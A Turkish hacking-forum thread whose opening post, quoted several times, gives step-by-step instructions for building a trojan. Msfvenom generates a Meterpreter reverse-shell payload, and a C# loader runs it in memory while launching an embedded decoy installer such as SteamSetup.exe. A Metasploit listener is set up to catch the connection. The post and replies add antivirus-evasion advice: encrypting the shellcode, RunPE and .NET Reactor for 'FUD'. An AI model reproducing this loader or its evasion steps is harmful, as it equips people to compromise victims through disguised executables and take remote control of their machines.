Shell Kodun EXE ile Entegrasyonu: İki Gücün Tek Çatıda Buluşması

[melomel]

Öncelikle merhaba. İlk olarak metasploit framework aracından yardım alarak csharp ile shell kod olusturup başka bi uygulama ile birleştiircez

Kullanıcağımız derleyici

Visual Studio​

- metasploit frameworkü tanıyalım - özetle Metasploit, siber güvenlik ve penetrasyon testlerinde yaygın olarak kullanılan açık kaynaklı bir araçtır. Temelde, güvenlik açıklarını keşfetmek, test etmek ve istismar etmek için kullanılır. Metasploit, güvenlik araştırmacılarının, sistemlerin ve uygulamaların zayıf noktalarını tespit etmelerine yardımcı olur. Ayrıca, sızma testleri sırasında çeşitli araçlar, exploitler (istismar araçları), payload’lar (zararlı yazılım yükleri) ve çeşitli modüller içerirmektedir

1. aşama ilk olarak shell kodunu oluşturalım

msfvenom -p windows/meterpreter/reverse_tcp LHOST=kendi ip nizi LPORT=4444 -f csharp

oklarla gösterilen yerden itibaren kopyalıyoruz

2. Aşama shell kodunu çalıştırıp , exeyi gömmede hadi geçelim

using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Diagnostics;

class Program
{
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

    [DllImport("kernel32.dll")]
    static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);

    [DllImport("kernel32.dll")]
    static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

    static void Main()
    {
        // Shell kodu (örneğin)
        byte[] shellcode = new byte[] { Shell kodunuz burada  };

        // Gömülü uygulamanın adını dinamik bulma
        Assembly assembly = Assembly.GetExecutingAssembly();
        var resourceNames = assembly.GetManifestResourceNames();
        string resourceName = resourceNames.FirstOrDefault(name => name.EndsWith("yuklediginiz uygulamyı yazın ornegın =SteamSetup.exe"));

        if (resourceName == null)
        {
            Console.WriteLine("Gömülü dosya bulunamadı.");
            return;
        }

        // Gömülü EXE dosyasını geçici bir dosyaya yazma
        using (Stream resourceStream = assembly.GetManifestResourceStream(resourceName))
        {
            if (resourceStream == null)
            {
                Console.WriteLine("Gömülü dosya okunamadı.");
                return;
            }

            string tempFilePath = Path.Combine(Path.GetTempPath(), "burayada yazin SteamSetup.exe");
            using (FileStream fileStream = new FileStream(tempFilePath, FileMode.Create, FileAccess.Write))
            {
                resourceStream.CopyTo(fileStream);
            }

            // Gömülü EXE'yi çalıştır
            Process.Start(tempFilePath);
        }

        // Shell kodu çalıştırma
        IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, 0x1000 | 0x2000, 0x40);
        Marshal.Copy(shellcode, 0, addr, shellcode.Length);
        IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, out uint threadId);
        WaitForSingleObject(hThread, 0xFFFFFFFF);
    }
}

bu kodun çalışması için exeyi gömmeliyiz hadi geçelim

okla gösterilen yeri sağ tıklayıp
Ekle > Var Olan Öğeyi seçin ve



tüm dosyaları seçmeyi unutmayın yoksa exe bulunmuyo sonra exeyi bulun ve ekleyin



Ve bu kadar hiçte zor değil dimi sadece çok kısa bi işlem kaldı

exeye sağ tıklayın > özellikler dedikten sonra ayarları resimdeki gibi yapabilirsiniz



Unutmadan msfconsole yazıp bağlantı ayarlarını yapalım

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LPORT -başta oluşturduğumuz shell kodda port- set LHOST -başta oluşturduğumuz shell kodda ip adresiniz- exploit

3. Burası isteğe bağlı ama ben bahsetmek istededin


sağ tıklayın > özellikler Ve aşağıdaki görseldeki ayarları yapmanızı öneririm


[url=https://hizliresim.com/qvd4vqi][/URL]

önemli olan çıkış türünü -Windows uygulaması- yapın

Ve bu kadar sıra En Zor işe geldi
"uygulamayı çalıştırın"


Kodu çalıştıralım ve oluşan exe yi alalım ve çalıştıralım

Veeeeeee sonuç



Not=Şuanda antivirüslere 15/38 gibi bir yakalnma oranı var eğer shell kodunu şifrelerseniz bunu antiviruslere yakalanma orani düşürebilirsiniz

 

[moriartyy]

eline sağlık, yararlı konu olmuş.

 

[melomel]

eline sağlık, yararlı konu olmuş.

Eyvallah hocam

 

[slowbaskan123]

Eyvallah hocam

Güzel ama çalıştırınca yakalanacaktır bunun için RunPE ile birleştirip .NET Reaktör'e atarsanız hem %100 FUD hemde Runtime geçer diye tahmin ediyorum.

 

[melomel]

Güzel ama çalıştırınca yakalanacaktır bunun için RunPE ile birleştirip .NET Reaktör'e atarsanız hem %100 FUD hemde Runtime geçer diye tahmin ediyorum.

Hocam zaten konun sonunda bagsettim suanda yakaliniyo antiviruslere

 

[slowbaskan123]

Hocam zaten konun sonunda bagsettim suanda yakaliniyo antiviruslere

Öneride bulundum işte bu kodlar için özel bir RunPE yazarsan runtime sorunsuz çalıştırırsın.

 

[melomel]

Öneride bulundum işte bu kodlar için özel bir RunPE yazarsan runtime sorunsuz çalıştırırsın.

Öneriniz için soulun hocam yapmaya çalışicam

 

[egemizah]

Öncelikle merhaba. İlk olarak metasploit framework aracından yardım alarak csharp ile shell kod olusturup başka bi uygulama ile birleştiircez

Kullanıcağımız derleyici

Visual Studio​

- metasploit frameworkü tanıyalım - özetle Metasploit, siber güvenlik ve penetrasyon testlerinde yaygın olarak kullanılan açık kaynaklı bir araçtır. Temelde, güvenlik açıklarını keşfetmek, test etmek ve istismar etmek için kullanılır. Metasploit, güvenlik araştırmacılarının, sistemlerin ve uygulamaların zayıf noktalarını tespit etmelerine yardımcı olur. Ayrıca, sızma testleri sırasında çeşitli araçlar, exploitler (istismar araçları), payload’lar (zararlı yazılım yükleri) ve çeşitli modüller içerirmektedir

1. aşama ilk olarak shell kodunu oluşturalım

msfvenom -p windows/meterpreter/reverse_tcp LHOST=kendi ip nizi LPORT=4444 -f csharp

oklarla gösterilen yerden itibaren kopyalıyoruz

2. Aşama shell kodunu çalıştırıp , exeyi gömmede hadi geçelim

using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Diagnostics;

class Program
{
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

    [DllImport("kernel32.dll")]
    static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);

    [DllImport("kernel32.dll")]
    static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

    static void Main()
    {
        // Shell kodu (örneğin)
        byte[] shellcode = new byte[] { Shell kodunuz burada  };

        // Gömülü uygulamanın adını dinamik bulma
        Assembly assembly = Assembly.GetExecutingAssembly();
        var resourceNames = assembly.GetManifestResourceNames();
        string resourceName = resourceNames.FirstOrDefault(name => name.EndsWith("yuklediginiz uygulamyı yazın ornegın =SteamSetup.exe"));

        if (resourceName == null)
        {
            Console.WriteLine("Gömülü dosya bulunamadı.");
            return;
        }

        // Gömülü EXE dosyasını geçici bir dosyaya yazma
        using (Stream resourceStream = assembly.GetManifestResourceStream(resourceName))
        {
            if (resourceStream == null)
            {
                Console.WriteLine("Gömülü dosya okunamadı.");
                return;
            }

            string tempFilePath = Path.Combine(Path.GetTempPath(), "burayada yazin SteamSetup.exe");
            using (FileStream fileStream = new FileStream(tempFilePath, FileMode.Create, FileAccess.Write))
            {
                resourceStream.CopyTo(fileStream);
            }

            // Gömülü EXE'yi çalıştır
            Process.Start(tempFilePath);
        }

        // Shell kodu çalıştırma
        IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, 0x1000 | 0x2000, 0x40);
        Marshal.Copy(shellcode, 0, addr, shellcode.Length);
        IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, out uint threadId);
        WaitForSingleObject(hThread, 0xFFFFFFFF);
    }
}

bu kodun çalışması için exeyi gömmeliyiz hadi geçelim

okla gösterilen yeri sağ tıklayıp
Ekle > Var Olan Öğeyi seçin ve



tüm dosyaları seçmeyi unutmayın yoksa exe bulunmuyo sonra exeyi bulun ve ekleyin



Ve bu kadar hiçte zor değil dimi sadece çok kısa bi işlem kaldı

exeye sağ tıklayın > özellikler dedikten sonra ayarları resimdeki gibi yapabilirsiniz



Unutmadan msfconsole yazıp bağlantı ayarlarını yapalım

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LPORT -başta oluşturduğumuz shell kodda port- set LHOST -başta oluşturduğumuz shell kodda ip adresiniz- exploit

3. Burası isteğe bağlı ama ben bahsetmek istededin


sağ tıklayın > özellikler Ve aşağıdaki görseldeki ayarları yapmanızı öneririm


[url=https://hizliresim.com/qvd4vqi][/URL]

önemli olan çıkış türünü -Windows uygulaması- yapın

Ve bu kadar sıra En Zor işe geldi
"uygulamayı çalıştırın"


Kodu çalıştıralım ve oluşan exe yi alalım ve çalıştıralım

Veeeeeee sonuç



Not=Şuanda antivirüslere 15/38 gibi bir yakalnma oranı var eğer shell kodunu şifrelerseniz bunu antiviruslere yakalanma orani düşürebilirsiniz

Elinize emeginize saglık

 

[melomel]

Elinize emeginize saglık

teşekkürler hocam

 

[sessizejder]

İyi bence

 

[melomel]

İyi bence

teşekkürler hocam kolay ama etkili shellter in cok basit hali

 

[Blackprins]

Öncelikle merhaba. İlk olarak metasploit framework aracından yardım alarak csharp ile shell kod olusturup başka bi uygulama ile birleştiircez

Kullanıcağımız derleyici

Visual Studio​

- metasploit frameworkü tanıyalım - özetle Metasploit, siber güvenlik ve penetrasyon testlerinde yaygın olarak kullanılan açık kaynaklı bir araçtır. Temelde, güvenlik açıklarını keşfetmek, test etmek ve istismar etmek için kullanılır. Metasploit, güvenlik araştırmacılarının, sistemlerin ve uygulamaların zayıf noktalarını tespit etmelerine yardımcı olur. Ayrıca, sızma testleri sırasında çeşitli araçlar, exploitler (istismar araçları), payload’lar (zararlı yazılım yükleri) ve çeşitli modüller içerirmektedir

1. aşama ilk olarak shell kodunu oluşturalım

msfvenom -p windows/meterpreter/reverse_tcp LHOST=kendi ip nizi LPORT=4444 -f csharp

oklarla gösterilen yerden itibaren kopyalıyoruz

2. Aşama shell kodunu çalıştırıp , exeyi gömmede hadi geçelim

using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Diagnostics;

class Program
{
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

    [DllImport("kernel32.dll")]
    static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);

    [DllImport("kernel32.dll")]
    static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

    static void Main()
    {
        // Shell kodu (örneğin)
        byte[] shellcode = new byte[] { Shell kodunuz burada  };

        // Gömülü uygulamanın adını dinamik bulma
        Assembly assembly = Assembly.GetExecutingAssembly();
        var resourceNames = assembly.GetManifestResourceNames();
        string resourceName = resourceNames.FirstOrDefault(name => name.EndsWith("yuklediginiz uygulamyı yazın ornegın =SteamSetup.exe"));

        if (resourceName == null)
        {
            Console.WriteLine("Gömülü dosya bulunamadı.");
            return;
        }

        // Gömülü EXE dosyasını geçici bir dosyaya yazma
        using (Stream resourceStream = assembly.GetManifestResourceStream(resourceName))
        {
            if (resourceStream == null)
            {
                Console.WriteLine("Gömülü dosya okunamadı.");
                return;
            }

            string tempFilePath = Path.Combine(Path.GetTempPath(), "burayada yazin SteamSetup.exe");
            using (FileStream fileStream = new FileStream(tempFilePath, FileMode.Create, FileAccess.Write))
            {
                resourceStream.CopyTo(fileStream);
            }

            // Gömülü EXE'yi çalıştır
            Process.Start(tempFilePath);
        }

        // Shell kodu çalıştırma
        IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, 0x1000 | 0x2000, 0x40);
        Marshal.Copy(shellcode, 0, addr, shellcode.Length);
        IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, out uint threadId);
        WaitForSingleObject(hThread, 0xFFFFFFFF);
    }
}

bu kodun çalışması için exeyi gömmeliyiz hadi geçelim

okla gösterilen yeri sağ tıklayıp
Ekle > Var Olan Öğeyi seçin ve



tüm dosyaları seçmeyi unutmayın yoksa exe bulunmuyo sonra exeyi bulun ve ekleyin



Ve bu kadar hiçte zor değil dimi sadece çok kısa bi işlem kaldı

exeye sağ tıklayın > özellikler dedikten sonra ayarları resimdeki gibi yapabilirsiniz



Unutmadan msfconsole yazıp bağlantı ayarlarını yapalım

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LPORT -başta oluşturduğumuz shell kodda port- set LHOST -başta oluşturduğumuz shell kodda ip adresiniz- exploit

3. Burası isteğe bağlı ama ben bahsetmek istededin


sağ tıklayın > özellikler Ve aşağıdaki görseldeki ayarları yapmanızı öneririm


[url=https://hizliresim.com/qvd4vqi][/URL]

önemli olan çıkış türünü -Windows uygulaması- yapın

Ve bu kadar sıra En Zor işe geldi
"uygulamayı çalıştırın"


Kodu çalıştıralım ve oluşan exe yi alalım ve çalıştıralım

Veeeeeee sonuç



Not=Şuanda antivirüslere 15/38 gibi bir yakalnma oranı var eğer shell kodunu şifrelerseniz bunu antiviruslere yakalanma orani düşürebilirsiniz

Güzel anlatım olmus tebrikler

 

[ferah-KaRoN]

elinle saglık bilgiler icin teşekkürler

 

[melomel]

Güzel anlatım olmus tebrikler

Saolun hocam

elinle saglık bilgiler icin teşekkürler

eyvalla hocam

 

[Hacker 1K.v2]

Yapamadım ben

 

[melomel]

Yapamadım ben

hocam tahminimc " buraya yazin steamstup exe "yazisina sadece uygulaminin ismini yazmalisiniz eger baska bisey varsa paylasirsaniz yardimci olurum

Yapamadım ben

Hatayi paylasirsaniz yardimci olayim hocam

 

[Hacker 1K.v2]

hocam tahminimc " buraya yazin steamstup exe "yazisina sadece uygulaminin ismini yazmalisiniz eger baska bisey varsa paylasirsaniz yardimci olurum


Hatayi paylasirsaniz yardimci olayim hocam

Deneyip geri yazarım yardımınız için teşekkürler

 

[melomel]

Deneyip geri yazarım yardımınız için teşekkürler

tammadir hocam

Guncell ++

 

[melomel]

Guncell ++

 

[u1ku1912]

Öncelikle merhaba. İlk olarak metasploit framework aracından yardım alarak csharp ile shell kod olusturup başka bi uygulama ile birleştiircez

Kullanıcağımız derleyici

Visual Studio​

- metasploit frameworkü tanıyalım - özetle Metasploit, siber güvenlik ve penetrasyon testlerinde yaygın olarak kullanılan açık kaynaklı bir araçtır. Temelde, güvenlik açıklarını keşfetmek, test etmek ve istismar etmek için kullanılır. Metasploit, güvenlik araştırmacılarının, sistemlerin ve uygulamaların zayıf noktalarını tespit etmelerine yardımcı olur. Ayrıca, sızma testleri sırasında çeşitli araçlar, exploitler (istismar araçları), payload’lar (zararlı yazılım yükleri) ve çeşitli modüller içerirmektedir

1. aşama ilk olarak shell kodunu oluşturalım

msfvenom -p windows/meterpreter/reverse_tcp LHOST=kendi ip nizi LPORT=4444 -f csharp

oklarla gösterilen yerden itibaren kopyalıyoruz

2. Aşama shell kodunu çalıştırıp , exeyi gömmede hadi geçelim

using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Diagnostics;

class Program
{
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

    [DllImport("kernel32.dll")]
    static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);

    [DllImport("kernel32.dll")]
    static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

    static void Main()
    {
        // Shell kodu (örneğin)
        byte[] shellcode = new byte[] { Shell kodunuz burada  };

        // Gömülü uygulamanın adını dinamik bulma
        Assembly assembly = Assembly.GetExecutingAssembly();
        var resourceNames = assembly.GetManifestResourceNames();
        string resourceName = resourceNames.FirstOrDefault(name => name.EndsWith("yuklediginiz uygulamyı yazın ornegın =SteamSetup.exe"));

        if (resourceName == null)
        {
            Console.WriteLine("Gömülü dosya bulunamadı.");
            return;
        }

        // Gömülü EXE dosyasını geçici bir dosyaya yazma
        using (Stream resourceStream = assembly.GetManifestResourceStream(resourceName))
        {
            if (resourceStream == null)
            {
                Console.WriteLine("Gömülü dosya okunamadı.");
                return;
            }

            string tempFilePath = Path.Combine(Path.GetTempPath(), "burayada yazin SteamSetup.exe");
            using (FileStream fileStream = new FileStream(tempFilePath, FileMode.Create, FileAccess.Write))
            {
                resourceStream.CopyTo(fileStream);
            }

            // Gömülü EXE'yi çalıştır
            Process.Start(tempFilePath);
        }

        // Shell kodu çalıştırma
        IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, 0x1000 | 0x2000, 0x40);
        Marshal.Copy(shellcode, 0, addr, shellcode.Length);
        IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, out uint threadId);
        WaitForSingleObject(hThread, 0xFFFFFFFF);
    }
}

bu kodun çalışması için exeyi gömmeliyiz hadi geçelim

okla gösterilen yeri sağ tıklayıp
Ekle > Var Olan Öğeyi seçin ve



tüm dosyaları seçmeyi unutmayın yoksa exe bulunmuyo sonra exeyi bulun ve ekleyin



Ve bu kadar hiçte zor değil dimi sadece çok kısa bi işlem kaldı

exeye sağ tıklayın > özellikler dedikten sonra ayarları resimdeki gibi yapabilirsiniz



Unutmadan msfconsole yazıp bağlantı ayarlarını yapalım

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LPORT -başta oluşturduğumuz shell kodda port- set LHOST -başta oluşturduğumuz shell kodda ip adresiniz- exploit

3. Burası isteğe bağlı ama ben bahsetmek istededin


sağ tıklayın > özellikler Ve aşağıdaki görseldeki ayarları yapmanızı öneririm


[url=https://hizliresim.com/qvd4vqi][/URL]

önemli olan çıkış türünü -Windows uygulaması- yapın

Ve bu kadar sıra En Zor işe geldi
"uygulamayı çalıştırın"


Kodu çalıştıralım ve oluşan exe yi alalım ve çalıştıralım

Veeeeeee sonuç



Not=Şuanda antivirüslere 15/38 gibi bir yakalnma oranı var eğer shell kodunu şifrelerseniz bunu antiviruslere yakalanma orani düşürebilirsiniz

Yararlı konu. Eline sağlık, devamını bekleriz.